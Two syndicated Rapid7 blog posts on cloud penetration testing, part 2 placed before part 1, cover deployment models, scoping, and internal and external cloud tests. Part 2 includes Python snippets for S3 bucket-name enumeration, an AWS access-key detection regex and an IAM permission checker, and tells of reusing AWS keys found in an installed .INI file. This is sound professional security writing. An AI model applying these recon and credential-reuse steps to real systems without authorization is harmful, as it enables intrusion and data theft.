At last, the greatest reduction in liability: software as a service (SaaS). Microsoft’s Office 365 is perhaps the most common example of a very widely used SaaS deployment. Click a few buttons in a cloud provider’s dashboard, input some user credentials, upload some data, and you’re done! Easy like Sunday morning!  

Now, the only thing to worry about is the data within the application and the users themselves. Everything else — including virtual machine deployment, operating system installation and upkeep, patch management of the operating system and the software installed on it, and the code base, to name a few — is completely removed from worry. Imagine how much overhead you can now dedicate to other parts of the business. Windows admins, web app developers, infosec staff, and even IT staff now have less to worry about. However, if you’re looking to have a pentest in this kind of environment, just know that there is not a whole lot that can actually be done.

Application exploits, for example, are OUT of scope. The items that are IN scope for this deployment model are the following:

  • Leveraging privileges and attempting to acquire data
  • Adding user accounts or elevating privileges

That’s it! The only thing that can be attacked is the users themselves, via password attacks, or the data that is held within the application — but that’s only if authentication is bypassed.

These examples aren’t made up from Rapid7’s perspective, either. They are industry-wide standards that the cloud providers themselves have created. These types of deployments are specifically designed to reduce liability and to increase not only the capabilities of an organization but also its speed. This is known as the "shared responsibility" model.

As-a-service example

Recently, we had a discussion with a client who needed a pentest performed on their web application, which was deployed through a third-party cloud provider running Google Cloud Platform on the back end. Once a consultant discovered that the client had deployed the application via the SaaS model, I explained that application exploitation was out of scope, and the only attempts that could be made would be password attacks and going after the data.

Now, obviously, education needs to happen all around, but again, the cloud isn’t new. After about an hour of discussing how their deployment looked, the client asked a very interesting question: “How can I get to the point where we make the application available to fully attempt exploitation against it?” I was befuddled, and quite simply, the answer was, “Why would you want to do that?” You see, by using SaaS, you remove the liability of worrying about this sort of issue, which the organization may not have the capacity or budget to address. SaaS is click-and-go, and the software provider now carries the responsibility of delivering a secured platform.

After I had explained this to the client, they quickly understood that SaaS is the way to go, and transforming into a PaaS deployment model would have actually required that they now hire additional headcount, including a web app developer.

It is this maturity that needs to happen throughout the industry to continue to maintain security within not just small companies, but large enterprises, too.

Digging deeper

Externally

There have been numerous breaches of customer data, and there’s typically a common culprit: a misconfigured S3 bucket, or discovered credentials for a cloud vendor’s platform dashboard. These seem like very easy things to remedy, but an external pentest that targets the assets hosted by a cloud vendor will certainly show whether there are misconfigurations or accidental access being granted. This can be treated like any normal external pentest, with the sole difference being the knowledge that these assets live within a cloud environment.
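
One concrete flavor of that external testing is S3 bucket discovery. Here is a minimal sketch of the permutation step, assuming a simple naming convention; the suffix list is illustrative only, and real recon wordlists are far larger:

```python
# Hedged sketch of one external recon step: generating candidate S3
# bucket names from a target organization's name. The suffixes here are
# hypothetical examples of common naming patterns, not an exhaustive list.
def candidate_buckets(org: str) -> list:
    """Return plausible bucket names derived from an org name."""
    base = org.lower().replace(" ", "-")
    suffixes = ["", "-backup", "-logs", "-dev", "-prod", "-assets"]
    return [f"{base}{s}" for s in suffixes]

# Each candidate would then be probed (with authorization!) for
# unauthenticated listing or read access.
for name in candidate_buckets("Example Corp"):
    print(f"https://{name}.s3.amazonaws.com")
```

A tester would only probe the resulting URLs within an authorized scope; unauthenticated access to any of them is exactly the misconfiguration behind many of the breaches mentioned above.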

Internally

There are multiple considerations when discussing what is “internal” to a cloud environment. Here, we’ll dig into the differences between platform and infrastructure.

Platform vs. infrastructure

In order to move or create assets within a cloud environment, one must first set up an account with the cloud vendor of choice. A username and password are created, then a user logs into the web application dashboard of the cloud vendor, and finally, assets are created and deployed to provide the functionality that is needed. The platform that the user is logged into is one aspect of an “internal” pentest against a cloud environment.  

Platform pentest example

There I was, doing a thick client pentest against an executable. I installed the application on my Windows VM, started up a few more apps to hook into the running processes, and off to the races I went.

One of the more basic steps in the process is to check the installation files. Within the directory, I found an .INI file. I opened it with a text editor and was greeted with an Amazon AWS Access Key ID and Secret Access Key! Wow, did I get lucky. I fired up the AWS CLI, punched in the Access Key ID and Secret Access Key, and bam! I was in like Flynn.
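
A check like the one that caught this .INI file is easy to automate. Here is a minimal sketch that flags anything matching AWS's published access key ID format; the sample file content below is made up for illustration:

```python
import re

# Illustrative sketch: scanning text for AWS access key IDs. AWS access
# key IDs are 20 characters, typically beginning with "AKIA" (long-term)
# or "ASIA" (temporary/STS). Secret keys have no reliable prefix, so
# real scanners pair this with entropy checks.
ACCESS_KEY_RE = re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")

def find_aws_keys(text: str) -> list:
    """Return anything that looks like an AWS access key ID."""
    return [m.group(0) for m in ACCESS_KEY_RE.finditer(text)]

# Made-up config contents, using AWS's documented example key
ini = "aws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = ..."
print(find_aws_keys(ini))  # → ['AKIAIOSFODNN7EXAMPLE']
```

Running a pattern like this across an application's install directory takes seconds and catches exactly the kind of hardcoded credential described in this story.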

Now, kudos go out to the client that didn’t provide this user with root access. However, I was still able to gain a ton of access with additional information. I stopped from there though, because this quickly turned into a cloud-style pentest. I called the client up right away and informed them of this information, and they were happy (not happy) that this was discovered.

Internal platform pentest

A platform pentest is like being given a domain account, in an assumed-breach scenario, on an internal pentest. It’s a “hey, if you can’t get creds, here’s a low-priv account to see what you can do with it” approach.

On a cloud platform pentest, we’re given this account to attempt additional attacks, such as privilege escalation, launching additional virtual machines, or using a function to inject code into containers that auto-deploy and dial back to a listening server each time. A virtual machine, preferably running Kali Linux, will need to be deployed within the VPC so you can perform your internal pentest from it.
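
The privilege-escalation enumeration mentioned above boils down to asking, for each interesting action, "does my low-privilege policy allow this?" Here is a simplified sketch of that wildcard check; real IAM evaluation also involves explicit denies, resources, and conditions, which this deliberately ignores:

```python
import fnmatch

# Hedged sketch: checking whether an IAM-style policy statement allows a
# given action. This models only the Action wildcard matching a tester
# performs when enumerating what a low-privilege account can do.
def action_allowed(policy: dict, action: str) -> bool:
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        actions = stmt.get("Action", [])
        if isinstance(actions, str):
            actions = [actions]  # a single action may appear as a string
        if any(fnmatch.fnmatch(action, pat) for pat in actions):
            return True
    return False

# A hypothetical read-only policy for the assumed-breach account
low_priv = {"Statement": [{"Effect": "Allow", "Action": "ec2:Describe*"}]}
print(action_allowed(low_priv, "ec2:DescribeInstances"))  # → True
print(action_allowed(low_priv, "ec2:RunInstances"))       # → False
```

Walking a list of high-value actions (creating users, attaching policies, launching instances) through a check like this is how a tester quickly maps out which escalation paths are worth pursuing.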

Internal infrastructure pentest

This pentest is much easier to construct. It looks very similar to an internal, on-premise pentest. The client sets up a virtual machine inside the VPC they want tested, the consultant creates a public/private SSH keypair and provides the public key to the client, the client allows specific source IPs to SSH into that VM, and the pentest begins.

In my experience, a lot of clients only have one VPC, so that makes life a bit easier. However, as more people gain experience with setting up cloud environments, VPC separation is becoming more prevalent. As an example, perhaps a customer uses functions to auto-deploy a new “site” each time one of their customers signs on to use their services. The function automatically creates a brand-new VPC, separated from the other VPCs (their other clients), along with virtual machines, databases, network connectivity, access into the VPC for the client’s administrators, user accounts, authentication, SSO, and more. In this scenario, we’d ask the client to create multiple VPCs and drop us into at least one of them. This way, we can perform a tenant-to-tenant-style pentest, to see if it’s possible to break out of one segment to access another.

In part three, we’ll take a look at how the maturity of the client’s cloud implementation can impact the way pentests are carried out. Stay tuned!


Cloud Pentesting, Pt. 1: Breaking Down the Basics

Post Syndicated from Eric Mortaro original https://blog.rapid7.com/2022/03/21/cloud-pentesting-pt-1-breaking-down-the-basics/


The concept of cloud computing has been around for a while, but it seems like as of late — at least in the penetration testing field — more and more customers are looking to get a pentest done in their cloud deployment. What does that mean? How does that look? What can be tested, and what’s out of scope? Why would I want a pentest in the cloud? Let’s start with the basics here, to hopefully shed some light on what this is all about, and then we’ll get into the thick of it.

Cloud computing is the idea of using software and services that run on the internet as a way for an organization to deploy their once on-premise systems. This isn’t a new concept — in fact, the major vendors, such as Amazon’s AWS, Microsoft’s Azure, and Google’s Cloud Platform, have all been around for about 15 years. Still, cloud sometimes seems like it’s being talked about as if it was invented just yesterday, but we’ll get into that a bit more later.

So, cloud computing means using someone else’s computer, in a figurative or quite literal sense. Simple enough, right?  

Wrong! There are various ways that companies have started to utilize cloud providers, and these all impact how pentests are carried out in cloud environments. Let’s take a closer look at the three primary cloud configurations.

Traditional cloud usage

Some companies have simply lifted infrastructure and services straight from their own on-premise data centers and moved them into the cloud. This looks a whole lot like setting up one virtual private cloud (VPC), with numerous virtual machines, a flat network, and that’s it! While this might not seem like a company is using their cloud vendor to its fullest potential, they’re still reaping the benefits of never having to manage uptime of physical hardware, calling their ISP late at night because of an outage, or worrying about power outages or cooling.

But one inherent problem remains: The company still requires significant staff to maintain the virtual machines and perform operating system updates, software versioning, cipher suite usage, code base fixes, and more. This starts to look a lot like the typical vulnerability management (VM) program, where IT and security continue to own and maintain infrastructure. They work to patch and harden endpoints in the cloud and remain in the approval path for changes committed to the cloud infrastructure.

Cloud-native usage

The other side of cloud adoption is a more mature approach, where a company has devoted time and effort toward transitioning their once on-premise infrastructure to a fully utilized cloud deployment. While this could very well include the use of the typical VPC, network stack, virtual machines, and more, the more mature organization will utilize cloud-native deployments. These could include storage services such as S3, function services, or even cloud-native Kubernetes.

Cloud-native users shift the priorities and responsibilities of IT and security teams so that they no longer act as gatekeepers to prevent the scaling up or out of infrastructure utilized by product teams. In most of these environments, the product teams own the ability to make commitments in the cloud without IT and security input. Meanwhile, IT and security focus on proper controls and configurations to prevent security incidents. Patching is exchanged for rebuilds, and network alerting and physical server isolation are handled through automated responses, such as an alert with AWS Config that automatically changes the security group for a resource in the cloud and isolates it for further investigation.
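
The automated-response idea above can be sketched as a small decision function of the kind a remediation Lambda might call before swapping a resource's security group. This is a hedged illustration: the rule names and the finding structure are simplified stand-ins, not the exact payloads AWS Config delivers:

```python
# Hedged sketch of an automated-response decision: given a compliance
# finding, decide whether to quarantine the resource by moving it to an
# isolation security group. The rule names are illustrative; the actual
# remediation call (e.g. modifying the instance's security groups via
# the EC2 API) is omitted here.
QUARANTINE_RULES = {"restricted-ssh", "s3-bucket-public-read-prohibited"}

def should_quarantine(finding: dict) -> bool:
    """Quarantine on a NON_COMPLIANT result for a rule we act on."""
    return (finding.get("complianceType") == "NON_COMPLIANT"
            and finding.get("configRuleName") in QUARANTINE_RULES)

finding = {"configRuleName": "restricted-ssh",
           "complianceType": "NON_COMPLIANT"}
print(should_quarantine(finding))  # → True
```

Keeping the decision logic pure like this (separate from the API calls that actually isolate the resource) also makes the automated response easy to test before it's trusted to act on production infrastructure.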

These types of deployments start to more fully utilize the capabilities of the cloud, such as automated deployment through infrastructure-as-code solutions like AWS CloudFormation. Gone are the days when an organization would deploy Kubernetes on top of a virtual machine to run containers. Now, cloud vendors provide this natively with AWS’s Elastic Kubernetes Service, Microsoft’s Azure Kubernetes Service, and, for obvious reasons, Google’s Kubernetes Engine. These and other types of cloud-native deployments really help ease the burden on the organization.

Hybrid cloud

Then there’s hybrid cloud. This is where a customer ties their on-premise environment into their cloud environment, or vice versa. One common theme we see is with Microsoft Azure, where Azure AD Connect sync is used to synchronize on-premise Active Directory to Azure AD. This can be very beneficial when the company is using other software-as-a-service (SaaS) components, such as Microsoft Office 365.

There are various benefits to utilizing hybrid cloud deployments. Maybe there are specific components that a customer wants to keep in house and support on their own infrastructure. Or perhaps the customer doesn’t yet have experience with how to maintain Kubernetes but is utilizing Google Cloud Platform. The ability to deploy your own services is the key to flexibility, and the cloud helps provide that.

In part two, we’ll take a closer look at how these different cloud deployments impact pentesting in the cloud.
